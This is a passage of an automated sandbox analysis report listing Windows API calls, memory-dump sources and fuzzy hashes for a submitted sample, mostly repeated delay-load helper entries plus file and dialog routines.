                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 56886fde0e23ece76ef56ce005ce46c8cb46886ed4e4e3ca0db80c152c354861
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: 56886fde0e23ece76ef56ce005ce46c8cb46886ed4e4e3ca0db80c152c354861
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a674cbff928c80dc6a40459479f5f515f90c98b86d4c3b387e8dcf226fcab87a
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: a674cbff928c80dc6a40459479f5f515f90c98b86d4c3b387e8dcf226fcab87a
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 9a35c0d787a7f47e3c3dc8a663122e730481908e6d0da234ab83ad15a1a90cf8
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a35c0d787a7f47e3c3dc8a663122e730481908e6d0da234ab83ad15a1a90cf8
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: f9d30d16dfa99f16f7ba76004c9fe857eaa4b707a27160bed0e771ec3b0609ba
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: f9d30d16dfa99f16f7ba76004c9fe857eaa4b707a27160bed0e771ec3b0609ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 07b938f2ea3441170a2bdea67fa65f2e698e8ad6408d98c6dd6a9f80478c7d25
                                                                                                                                                                          • Instruction ID: 151a6fbb751e135c418e6e137a79b23e2c64c6f78412def130f234dda6c33b15
                                                                                                                                                                          • Opcode Fuzzy Hash: 07b938f2ea3441170a2bdea67fa65f2e698e8ad6408d98c6dd6a9f80478c7d25
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA024C555C101FC300411501C03C3711CDC0C0F1573144DFFC31C10C07C404C040430
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 4f8734a852e00108fe44426eaa921dc82660bf7b2adf3fe93ecc88d80398b851
                                                                                                                                                                          • Instruction ID: 151a6fbb751e135c418e6e137a79b23e2c64c6f78412def130f234dda6c33b15
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f8734a852e00108fe44426eaa921dc82660bf7b2adf3fe93ecc88d80398b851
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA024C555C101FC300411501C03C3711CDC0C0F1573144DFFC31C10C07C404C040430
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: b53860704c7e258c77856a3b60db77e5499a8bb4a7dcce9c9c9db7a9b0f2ad67
                                                                                                                                                                          • Instruction ID: 40ce6b2561751e4cc353d15eecfc6d182015c79b9d45e9bc53a41c2a12db505a
                                                                                                                                                                          • Opcode Fuzzy Hash: b53860704c7e258c77856a3b60db77e5499a8bb4a7dcce9c9c9db7a9b0f2ad67
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EA012C55941007C300411601C02C3715CDC0D0B1673141DFF820910C0784049040430
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 3ed75346769c125640d0e8c59347f3307e68fe6a0f686f5fb3a87a34db78a0d7
                                                                                                                                                                          • Instruction ID: 340db07c7e6d9aac6d9af025746cdbbca7266cfdf41e694f84fb89415f012559
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed75346769c125640d0e8c59347f3307e68fe6a0f686f5fb3a87a34db78a0d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 36A012C1558101BC300411001C12C3B158DC0C2F1573044DFF821800C078404C450430
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 9dd97e15a9157847b483003d8915050ea7e0ebc3a6be982f1bcc78d0e94ba8ed
                                                                                                                                                                          • Instruction ID: 340db07c7e6d9aac6d9af025746cdbbca7266cfdf41e694f84fb89415f012559
                                                                                                                                                                          • Opcode Fuzzy Hash: 9dd97e15a9157847b483003d8915050ea7e0ebc3a6be982f1bcc78d0e94ba8ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 36A012C1558101BC300411001C12C3B158DC0C2F1573044DFF821800C078404C450430
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEndOfFile.KERNELBASE(?,00B2903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00B29F0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 749574446-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,00B3AE72,C:\Users\user\Desktop,00000000,00B6946A,00000006), ref: 00B3AC08
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,00B295D6,?,?,?,?,?,00B52641,000000FF), ref: 00B2963B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B3C2B1
                                                                                                                                                                          • EndDialog.USER32(?,00000006), ref: 00B3C2C4
                                                                                                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 00B3C2E0
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00B3C2E7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B3C321
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B3C358
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B3C36E
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B3C38C
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B3C39C
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B3C3B8
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B3C3D4
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C404
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B3C417
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00B3C41E
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C477
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B3C48A
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B3C4A7
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B3C4C7
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B3C4D7
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B3C4F1
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B3C509
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C535
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B3C548
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C59C
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B3C5AF
                                                                                                                                                                            • Part of subcall function 00B3AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B3AF35
                                                                                                                                                                            • Part of subcall function 00B3AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B5E72C,?,?), ref: 00B3AF84
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 797121971-1840816070
                                                                                                                                                                          • Opcode ID: c46eb1032b1be87a7dff58be6b9ca4820d4dba9cfaa890039e55eb675a14ac75
                                                                                                                                                                          • Instruction ID: c68dd47ab6460f9039ea85787ddbb5f8edb58d60c392f90ddc42d1273595e47a
                                                                                                                                                                          • Opcode Fuzzy Hash: c46eb1032b1be87a7dff58be6b9ca4820d4dba9cfaa890039e55eb675a14ac75
                                                                                                                                                                          • Instruction Fuzzy Hash: E291A372148344BBD221EBE0DC49FFB7BECEB49F01F044859F649E6191DB75A6088762
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B26FAA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27013
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27084
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B27AAB
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetLastError.KERNEL32 ref: 00B27AF1
                                                                                                                                                                            • Part of subcall function 00B27A9C: CloseHandle.KERNEL32(?), ref: 00B27B00
                                                                                                                                                                            • Part of subcall function 00B2A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641,000000FF), ref: 00B2A1F1
                                                                                                                                                                            • Part of subcall function 00B2A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641), ref: 00B2A21F
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B27139
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B27155
                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B27298
                                                                                                                                                                            • Part of subcall function 00B29DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B273BC,?,?,?,00000000), ref: 00B29DBC
                                                                                                                                                                            • Part of subcall function 00B29DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B29E70
                                                                                                                                                                            • Part of subcall function 00B29620: CloseHandle.KERNELBASE(000000FF,?,?,00B295D6,?,?,?,?,?,00B52641,000000FF), ref: 00B2963B
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A501
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A532
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
